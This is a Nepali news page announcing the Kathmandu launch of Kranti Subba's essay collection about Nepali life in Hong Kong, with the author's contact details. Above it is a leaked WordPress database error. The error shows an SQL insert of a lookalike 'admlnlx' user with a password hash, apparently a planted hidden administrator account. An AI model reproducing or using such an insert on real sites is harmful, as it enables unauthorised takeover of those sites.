WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B43Z3/ZUZZORUCn2rJPeoVlMPIgtMv/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 01:09:54', '', 'admlnlx', 'admlnlx')
गाउँले न्युज — काठमाडौं, श्रष्टा क्रान्ति सुब्बाद्वारा लिखित पुस्तक “हङकङभित्र” यसरी भब्य रुपमा विमोचन हुदै ।।
२५ वर्ष सम्मको लामो हङकङ बसाईको एउटा संघर्ष पुर्ण भोगाई र हङकङ भित्र ज्युउनको यथार्थ चित्रण अनि हङकङभित्र नेपाली समाजप्रतिको एउटा गहिरो चिन्तन र अध्ययनको त्यस्तो दस्तावेज हो कृति “हङकङभित्र” ।
वास्तविकतामा हङकङ के हो ? हङकङको भौगोलिक परिवेश, धर्म-संस्कृति, कला, रहनसहन, भाषा, भेषभूसा र आयस्रोत जस्ता विषयबस्तुमा अत्यान्तै गहिरो अनि गहकिलो बौद्धिक खुराक पनि हो कृति “हङकङभित्र” ।
यथार्थमा सन् २००२ देखि २०१६ सम्म संकलित नियात्राहरु कैद गरिएको एउटा निबन्ध संग्रह हो “हङकङभित्र” ।।
यही मिति २०७६ असार ११ गते बुधबारका दिन प्रज्ञा प्रतिष्ठानको भवन कमलादी काठमाडौंमा श्रष्टा क्रान्ति सुब्बाद्वारा लिखित पुस्तक “हङकङभित्र” भब्यताका साथ विमोचन हुने भएकोले सम्पुर्ण महानुभावहरुमा उपस्थितिको लागि हार्दिक अनुरोध गरिन्छ ।।
नोट :- थप जानकारीको लागि लेखक क्रान्ति सुब्बा
E-mail :- subbakranti@gmail.com
Phone :- 852-66237045
Fb -www.facebook.com / kranti.subba.1
https://gaulenews.com/?p=46818
https://gaulenews.com/?p=46791